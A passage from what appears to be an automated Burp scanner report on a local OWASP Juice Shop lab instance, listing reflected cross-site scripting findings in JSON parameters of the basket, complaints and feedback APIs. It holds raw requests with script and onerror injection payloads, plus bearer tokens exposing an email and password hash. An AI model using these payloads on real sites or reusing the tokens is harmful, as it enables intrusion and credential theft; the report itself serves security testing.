    {"ProductId":2,"BasketId":"4nbxaa<script>alert(1)<\/script>lvtd4","quantity":1}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 192
    ETag: W/"c0-2vE/cBQm1gGlWpAYvr/MAg"
    Date: Sun, 15 Jan 2017 21:07:08 GMT
    Connection: close

    {"status":"success","data":{"ProductId":2,"BasketId":"4nbxaa<script>alert(1)</script>lvtd4","quantity":1,"id":22,"updatedAt":"2017-01-15T21:07:08.000Z","createdAt":"2017-01-15T21:07:08.000Z"}}
    14.2. http://192.168.61.143:3000/api/BasketItems/ [ProductId JSON parameter]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/

    Issue detail

    The value of the ProductId JSON parameter is copied into the HTML document as plain text between tags. The payload cbv1z<img src=a onerror=alert(1)>kfy9x was submitted in the ProductId JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/BasketItems/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 43
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"ProductId":2cbv1z<img src=a onerror=alert(1)>kfy9x,"BasketId":"4","quantity":1}

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:07:01 GMT
    Connection: close
    Content-Length: 935

    {
    "error": {
    "message": "Unexpected token c",
    "stack": "SyntaxError: Unexpected token c\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    bleNT (_stream_readable.js:913:12)\n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"ProductId\":2cbv1z<img src=a onerror=alert(1)>kfy9x,\"BasketId\":\"4\",\"quantity\":1}",
    "status": 400,
    "statusCode": 400
    }
    }
    14.3. http://192.168.61.143:3000/api/BasketItems/ [quantity JSON parameter]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/

    Issue detail

    The value of the quantity JSON parameter is copied into the HTML document as plain text between tags. The payload g3fbk<img src=a onerror=alert(1)>ie33k was submitted in the quantity JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/BasketItems/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 43
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"ProductId":2,"BasketId":"4","quantity":1g3fbk<img src=a onerror=alert(1)>ie33k}

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:07:46 GMT
    Connection: close
    Content-Length: 935

    {
    "error": {
    "message": "Unexpected token g",
    "stack": "SyntaxError: Unexpected token g\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    \n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"ProductId\":2,\"BasketId\":\"4\",\"quantity\":1g3fbk<img src=a onerror=alert(1)>ie33k}",
    "status": 400,
    "statusCode": 400
    }
    }
    14.4. http://192.168.61.143:3000/api/BasketItems/ [request body]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/

    Issue detail

    The value of the request body is copied into the HTML document as plain text between tags. The payload yt4ij<script>alert(1)</script>ox4uy was submitted in the request body. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/BasketItems/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 43
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"ProductId":2,"BasketId":"4","quantity":1}yt4ij<script>alert(1)</script>ox4uy

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:06:55 GMT
    Connection: close
    Content-Length: 932

    {
    "error": {
    "message": "Unexpected token y",
    "stack": "SyntaxError: Unexpected token y\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"ProductId\":2,\"BasketId\":\"4\",\"quantity\":1}yt4ij<script>alert(1)</script>ox4uy",
    "status": 400,
    "statusCode": 400
    }
    }
    14.5. http://192.168.61.143:3000/api/Complaints/ [UserId JSON parameter]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Complaints/

    Issue detail

    The value of the UserId JSON parameter is copied into the HTML document as plain text between tags. The payload ukd1s<img src=a onerror=alert(1)>igepk was submitted in the UserId JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Complaints/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 36
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7ukd1s<img src=a onerror=alert(1)>igepk,"message":"wewewewewew"}

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:06:58 GMT
    Connection: close
    Content-Length: 926

    {
    "error": {
    "message": "Unexpected token u",
    "stack": "SyntaxError: Unexpected token u\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    adableNT (_stream_readable.js:913:12)\n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"UserId\":7ukd1s<img src=a onerror=alert(1)>igepk,\"message\":\"wewewewewew\"}",
    "status": 400,
    "statusCode": 400
    }
    }
    14.6. http://192.168.61.143:3000/api/Complaints/ [message JSON parameter]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Complaints/

    Issue detail

    The value of the message JSON parameter is copied into the HTML document as plain text between tags. The payload al4ob<script>alert(1)</script>nktji was submitted in the message JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Complaints/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 36
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"message":"wewewewewewal4ob<script>alert(1)<\/script>nktji"}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 185
    ETag: W/"b9-GNjm2HX4M6wxqFHpu+EV/w"
    Date: Sun, 15 Jan 2017 21:07:07 GMT
    Connection: close

    {"status":"success","data":{"UserId":7,"message":"wewewewewewal4ob<script>alert(1)</script>nktji","id":17,"updatedAt":"2017-01-15T21:07:07.000Z","createdAt":"2017-01-15T21:07:07.000Z"}}
    14.7. http://192.168.61.143:3000/api/Complaints/ [request body]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Complaints/

    Issue detail

    The value of the request body is copied into the HTML document as plain text between tags. The payload duj8k<script>alert(1)</script>s5sbw was submitted in the request body. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Complaints/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 36
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"message":"wewewewewew"}duj8k<script>alert(1)</script>s5sbw

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:06:48 GMT
    Connection: close
    Content-Length: 923

    {
    "error": {
    "message": "Unexpected token d",
    "stack": "SyntaxError: Unexpected token d\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    :913:12)\n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"UserId\":7,\"message\":\"wewewewewew\"}duj8k<script>alert(1)</script>s5sbw",
    "status": 400,
    "statusCode": 400
    }
    }
    14.8. http://192.168.61.143:3000/api/Feedbacks/ [UserId JSON parameter]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The value of the UserId JSON parameter is copied into the HTML document as plain text between tags. The payload lthfl<img src=a onerror=alert(1)>au7of was submitted in the UserId JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 42
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7lthfl<img src=a onerror=alert(1)>au7of,"comment":"wewewe","rating":0}

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:06:58 GMT
    Connection: close
    Content-Length: 934

    {
    "error": {
    "message": "Unexpected token l",
    "stack": "SyntaxError: Unexpected token l\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    adableNT (_stream_readable.js:913:12)\n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"UserId\":7lthfl<img src=a onerror=alert(1)>au7of,\"comment\":\"wewewe\",\"rating\":0}",
    "status": 400,
    "statusCode": 400
    }
    }
    14.9. http://192.168.61.143:3000/api/Feedbacks/ [comment JSON parameter]

    Summary

    Severity:   Information
    Confidence:   Firm
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The value of the comment JSON parameter is copied into the HTML document as plain text between tags. The payload npftf<a>yv6ra was submitted in the comment JSON parameter. This input was echoed unmodified in the application's response.

    This behavior demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behavior and attempt to identify any unusual input validation or other obstacles that may be in place.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 42
